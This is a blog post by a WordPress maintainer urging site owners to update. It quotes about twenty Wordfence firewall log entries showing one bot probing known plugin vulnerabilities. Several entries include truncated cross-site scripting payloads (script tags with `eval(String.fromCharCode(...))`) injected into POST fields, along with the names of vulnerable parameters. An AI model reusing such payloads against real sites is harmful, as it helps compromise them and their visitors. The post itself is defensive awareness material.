I often bang on about keeping your WordPress website updated, sometimes I feel like a bit of a stuck record but emails like the one below serve to remind us why its so important.
The details below came from an email send to me by WordFence a firewall plugin I tend to install on all WordPress sites that I look after, what each line shows is a fully automated attack against a known vulnerability, a hole so to speak that has already been fixed in a newer version of WordPress, however if the site being attacked is still running an old version, then any one of these attacks could give control of the site to the attacker.
Each line shows a bot attempting a different hack just seconds apart, and will keep going until either it gets in or has tried every attack it knows.
June 14, 2019 3:39am 192.241.166.230 (United States) Blocked for WP GDPR Compliance <= 1.4.2 – Update Any Option / Call Any Action in POST body: action=wpgdprc_process_action
June 14, 2019 3:39am 192.241.166.230 (United States) Blocked for WP GDPR Compliance <= 1.4.2 – Update Any Option / Call Any Action in POST body: action=wpgdprc_process_action
June 14, 2019 3:39am 192.241.166.230 (United States) Blocked for Total Donations (all known versions) – Multiple Unauthenticated AJAX Actions
June 14, 2019 3:39am 192.241.166.230 (United States) Blocked for Newspaper Premium Theme <= 6.7.1 – Privilege Escalation
June 14, 2019 3:39am 192.241.166.230 (United States) Blocked for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=test
June 14, 2019 3:39am 192.241.166.230 (United States) Blocked for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=test
June 14, 2019 3:38am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:38am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:38am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:38am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê June 14, 2019 3:50am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: css=</style><script language=javascript>eval(Strin
g.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:50am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: otw_pctl_custom_css=</textarea><script language=javascript>eval(Strin g.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61,ê
June 14, 2019 3:50am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: otw_pctl_custom_css=</textarea><script language=javascript>eval(Strin g.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61,ê
June 14, 2019 3:50am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: wp-piwik=<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 100, 111, ê
June 14, 2019 3:50am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: wp-piwik=<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 100, 111, ê
June 14, 2019 3:50am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: domain=</script><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 1ê
June 14, 2019 3:50am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:49am 192.241.166.230 (United States) Blocked for XSS: Cross Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:49am 192.241.166.230 (United States) Blocked for Blog Designer <= 1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
June 14, 2019 3:49am 192.241.166.230 (United States) Blocked for Blog Designer <= 1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10ê
So how how do you know which version of WordPress you have? simple log into your dashboard and have a look at the at a glance section, in the screenshot below you can see this site (at the time of writing) is running version 5.2.1. You can always find out what the current version is at https://wordpress.org/news/category/releases/
Once you know which version of WordPress you are running you can see how many known vulnerabilities there are over at the CVE details database. But to give you a rough idea, if your website is 2 years old, and hasn’t had WordPress updated you have at least 43 vulnerabilities, that’s 43 ways your website could be hacked. I say at least because that doesn’t include old versions of plugins and themes.
Simply put, you need to keep your website up to date, and doing so is pretty easy, although if you don’t feel comfortable doing it yourself, you can always get someone like me to do it for you.